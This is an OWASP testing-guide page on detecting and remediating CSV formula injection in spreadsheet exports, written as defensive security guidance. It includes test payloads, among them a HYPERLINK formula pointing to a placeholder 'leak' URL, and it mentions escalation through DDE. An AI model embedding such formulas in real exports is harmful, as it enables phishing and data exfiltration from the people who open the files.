WSTG - Latest

Testing for CSV Injection

ID
WSTG-INPV-21

Summary

CSV Injection (also known as Formula Injection) occurs when an application embeds untrusted, user-controlled input into CSV (or other spreadsheet-compatible) exports and the resulting file is opened in a spreadsheet program (e.g., Microsoft Excel, LibreOffice Calc). Spreadsheet applications may interpret certain cell values as formulas, which can lead to security issues such as user deception (phishing-style workflows), manipulation of spreadsheet output, or data exfiltration. In some environments, formula injection can be escalated through spreadsheet “gadgets” and legacy features (e.g., DDE / Dynamic Data Exchange), potentially reaching command execution on the workstation that opens the file. Such escalation typically depends on client configuration and/or user interaction.

A key characteristic of this issue is that the vulnerability often manifests only when a user (e.g., an administrator or a member of the finance or support staff) opens the exported file in a spreadsheet application, not when the data is submitted or exported.

Test Objectives

  • Identify CSV/spreadsheet export features that include untrusted input.
  • Verify whether attacker-controlled values are interpreted as formulas when the export is opened in common spreadsheet applications.
  • Check whether separator/quote injection can move a dangerous prefix to the start of a cell.
  • Validate whether mitigations remain effective in Microsoft Excel after saving and re-opening the CSV.
  • Assess practical impact based on who opens the export and how it is used.

How to Test

Formula-Triggering Prefixes

Cells beginning with the following characters may be interpreted as formulas by spreadsheet software:

  • Equals (=)
  • Plus (+)
  • Minus (-)
  • At (@)
  • Tab (0x09)
  • Carriage return (0x0D)
  • Line feed (0x0A)
  • Full-width (double-byte) variants such as ＝, ＋, －, ＠ (depending on locale/application behavior)

Important (Excel behavior): Microsoft Excel may remove quotes or escape characters from CSV cells when a file is saved and re-opened. As a result, some commonly suggested mitigations can fail after save/reopen and previously escaped formulas may become active again.

Also note that it is not sufficient to ensure the overall untrusted input does not start with a dangerous character. Attackers may inject separators and quoting to start a new cell, placing the dangerous character at the beginning of a cell.
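
The per-cell nature of the check can be illustrated with a minimal Python sketch. The function name starts_with_trigger and the constant names are hypothetical, and the choice of full-width code points (U+FF1D, U+FF0B, U+FF0D, U+FF20) is an assumption about which Unicode variants are relevant; adjust the list to the applications in scope.

```python
# Characters listed above as formula-triggering when they start a cell.
ASCII_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")
# Assumption: full-width variants of = + - @ (U+FF1D, U+FF0B, U+FF0D, U+FF20).
FULLWIDTH_TRIGGERS = ("\uFF1D", "\uFF0B", "\uFF0D", "\uFF20")


def starts_with_trigger(cell: str) -> bool:
    """Return True if the first character of a single cell is a trigger.

    The check is applied per cell, not per submitted input, because an
    input may be split into several cells by injected separators.
    """
    return cell.startswith(ASCII_TRIGGERS + FULLWIDTH_TRIGGERS)
```

Note that a check like this also flags legitimate values such as negative numbers (-5), so it is a detection aid for testing rather than a complete filter.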

Identify CSV Export Functionality and Data Sources

Locate features that generate CSV/TSV or “export to spreadsheet” content:

  • Reports (users, transactions, audit logs, tickets)
  • Admin dashboards exporting lists
  • Email attachments generated by the application
  • Scheduled exports / integrations

Identify untrusted data sources that can end up in the export:

  • User profiles (name, email, company)
  • Free-text fields (comments, ticket subjects, notes)
  • Imported/integrated external data (webhooks, CRM sync, partner feeds)

Document which roles can trigger the export and which roles are likely to open it.

Place Benign, Detectable Formula-Like Values into Candidate Fields

Use harmless payloads to detect formula evaluation (avoid payloads that execute commands or perform uncontrolled network access). Test values that begin with each formula-triggering character:

  • =1+1
  • +1+1
  • -1+1
  • @SUM(1,1)
  • =HYPERLINK("http://example.invalid/leak?test=1", "Click Me")

Notes:

  • The HYPERLINK() case is useful to demonstrate realistic impact (deception/phishing-style flows, or potential metadata exposure when a link is clicked/opened). Use a controlled endpoint during testing (e.g., a local listener or an internal test host).
  • Do not use external “real attacker” infrastructure in validation.

Also test control-character and Unicode variants (where input handling allows it):

  • A value that begins with a tab character followed by =1+1 (TAB + =1+1)
  • Full-width prefix variants (e.g., ＝1+1)
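
To keep test inputs consistent across fields, the benign values above can be collected in one place. The following is a small sketch; the function name benign_payloads and the marker parameter are hypothetical helpers for illustration, and the marker is only there so that a specific test run can be recognized in the export or on the controlled endpoint.

```python
def benign_payloads(marker: str = "1") -> dict:
    """Return harmless formula-like test values, keyed by a short label."""
    return {
        "equals": "=1+1",
        "plus": "+1+1",
        "minus": "-1+1",
        "at": "@SUM(1,1)",
        # example.invalid never resolves; swap in a controlled test host.
        "hyperlink": '=HYPERLINK("http://example.invalid/leak?test='
                     + marker + '", "Click Me")',
        # Control-character and full-width (U+FF1D) variants.
        "tab_equals": "\t=1+1",
        "fullwidth_equals": "\uFF1D1+1",
    }
```

Each value can then be submitted to one candidate field at a time (for example through an intercepting proxy), which makes it easier to map an evaluated cell back to the field that produced it.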

Test Separator and Quote “Cell Breakout” Scenarios

Because CSV is cell-based, test whether you can inject content that starts a new cell and then begins with a dangerous character. This depends on:

  • Field separator (commonly , or ;)
  • Quoting rules and escaping
  • Application-side CSV generation and encoding

Example benign test patterns (adjust separator to the actual export format):

  • A value containing a quote and separator intended to create a new cell, then =1+1
  • A value containing a separator directly (if not quoted by the exporter), then =1+1

Your objective is to see whether the resulting CSV contains any cell whose first character is one of the formula-triggering prefixes. Verify this by inspecting the raw CSV output in a text editor.
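
Inspection of the raw export can also be scripted. The sketch below parses CSV text with Python's standard csv module and reports every cell whose first character is a trigger. The function name find_formula_cells and the sample rows are hypothetical, and Python's parser is only an approximation of how a given spreadsheet application splits cells, so treat hits as leads to confirm manually.

```python
import csv
import io

TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")


def find_formula_cells(raw_csv: str, delimiter: str = ","):
    """Yield (row_index, column_index, cell) for cells starting with a trigger."""
    reader = csv.reader(io.StringIO(raw_csv, newline=""), delimiter=delimiter)
    for r, row in enumerate(reader):
        for c, cell in enumerate(row):
            if cell.startswith(TRIGGERS):
                yield r, c, cell


# Hypothetical export where the name "Bob,=1+1" was written without quoting:
# the injected separator starts a new cell that begins with "=".
naive = "id,name\r\n1,Bob,=1+1\r\n"

# The same value written by an exporter that quotes the field.
quoted = 'id,name\r\n1,"Bob,=1+1"\r\n'

print(list(find_formula_cells(naive)))   # one hit at row 1, column 2
print(list(find_formula_cells(quoted)))  # no hits
```

The second case shows why the overall input is not the right unit of analysis: the value does not start with a dangerous character, yet the unquoted export contains a cell that does.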

Export and Verify in Spreadsheet Applications

  • Export/download the CSV.
  • Open it in at least one spreadsheet application used in the target environment (Excel and/or LibreOffice, etc.).
  • Confirm whether the cell is interpreted as a formula:
    • The spreadsheet displays the computed result (e.g., 2) instead of the literal string (e.g., =1+1), and/or
    • The formula bar shows a formula rather than plain text.

Record:

  • Application name/version (e.g., Microsoft Excel)
  • How the file was opened (double-click vs import wizard)
  • Whether locale settings influenced parsing

Excel Save/Re-open Regression Test (Mitigation Reliability)

If the application claims to escape/quote values:

  • Open the exported CSV in Microsoft Excel.
  • Save the file (e.g., as CSV).
  • Close and re-open it.
  • Re-check whether previously “neutralized” values became active formulas.

This step is critical because Excel may strip or normalize quoting and escape characters when the file is saved and re-opened, which can reactivate values that appeared neutralized in the original export.

Assess Impact

Assess practical risk based on:

  • Who opens the file (privileged roles vs end users)
  • Whether exports are shared externally
  • Whether spreadsheet values are relied on for decisions (e.g., totals, flags, statuses)
  • Whether formulas could mislead users or trigger spreadsheet behaviors in your environment

Provide a clear reproduction path:

  1. Where input is entered
  2. How export is generated
  3. Which program interprets it as a formula
  4. Evidence (screenshot or description) that evaluation occurs

Higher-Impact Validation (Optional, Strictly Controlled)

Some real-world cases show formula injection escalating beyond simple calculation/deception (e.g., via legacy spreadsheet features such as DDE). This behavior is highly environment-dependent.

Remediation

There is no universal CSV sanitization strategy safe for all spreadsheet applications and downstream consumers. For CSVs intended for human viewing in spreadsheet software, apply a defense-in-depth approach:

  • Ensure no cell begins with formula-triggering characters (=, +, -, @) and relevant control/Unicode variants.
  • Consider per-field sanitization (commonly suggested):
    • Wrap each cell in double quotes
    • Prepend each cell with a single quote
    • Escape double quotes by doubling them
      Note: This may not remain reliable in Microsoft Excel after saving and re-opening.
  • Excel-resistant mitigation (observed behavior):
    • If a cell starts with =, +, -, or @, prefix the content with a tab character (0x09) inside a quoted field (e.g., "\t=1+1").
      Trade-off: The tab becomes part of the underlying data and may affect downstream programmatic imports.

Always validate the chosen mitigation against the spreadsheet applications and workflows in scope.
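
The tab-prefix approach described above could look roughly like the following on the export side. This is a minimal sketch using Python's standard csv module, not a complete or universally safe sanitizer: the function names neutralize and write_csv are hypothetical, and only the four ASCII prefixes are handled (control-character and Unicode variants would need additional handling).

```python
import csv
import io

TRIGGERS = ("=", "+", "-", "@")


def neutralize(value: str) -> str:
    """Prefix a tab when the cell starts with =, +, -, or @."""
    return "\t" + value if value.startswith(TRIGGERS) else value


def write_csv(rows) -> str:
    """Serialize rows with every field quoted and embedded quotes doubled."""
    buf = io.StringIO(newline="")
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL)
    for row in rows:
        writer.writerow([neutralize(str(v)) for v in row])
    return buf.getvalue()


print(repr(write_csv([["Bob", "=1+1"]])))
# '"Bob","\t=1+1"\r\n'
```

As with the trade-off noted above, the tab becomes part of the data, and values such as negative numbers (-5) are also prefixed, so programmatic consumers of the export may need to strip it.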

Tools

  • Intercepting proxy (e.g., Burp Suite, ZAP) to inject controlled values and reproduce the exact export workflow.
  • Spreadsheet software for validation in an isolated environment (e.g., Microsoft Excel, LibreOffice Calc).
  • A safe HTTP listener (local or internal test host) to observe clicks/requests when validating HYPERLINK() behavior.
  • A text editor to inspect the raw CSV and confirm whether any cell begins with a formula-triggering prefix.

References